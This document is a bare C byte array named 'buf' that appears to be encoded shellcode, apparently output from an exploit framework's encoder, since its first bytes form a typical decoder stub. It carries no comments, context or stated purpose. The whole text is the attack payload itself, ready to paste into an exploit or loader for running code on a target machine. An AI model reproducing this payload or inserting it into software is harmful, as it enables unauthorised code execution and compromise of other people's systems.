unsigned char buf[] = 
"\xfc\xbb\xe4\xbe\xa0\x3f\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
"\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xc6\xe2\xd8\x0c\x37"
"\x47\x61\x10\x07\x2b\xe9\xe3\x57\x8f\x71\x3a\xaf\x73\xfa\x70"
"\xa9\xd7\x82\x46\x53\xb4\x0a\x90\xa8\x18\x93\xe8\xf6\xfc\x1b"
"\x23\x3e\xa1\xa3\x79\x58\x05\x2c\x48\x96\xe9\xb4\x82\xef\x4d"
"\x3d\xdd\x6a\x32\xc5\x19\x4d\x96\x4d\x3f\x9e\x7a\xd6\x8a\xd0"
"\xde\x5e\xcd\x29\x83\xe6\x48\x7b\x67\x6f\xa6\x48\xcb\xf7\xf0"
"\x97\xaf\x7f\x64\xd6\x13\xf8\x04\x28\xf0\x80\xf8\x2a\x54\x09"
"\x9a\xce\x38\x91\x64\x3e\xe3\x6b\x95\x3e\xe3\x6b\x95";
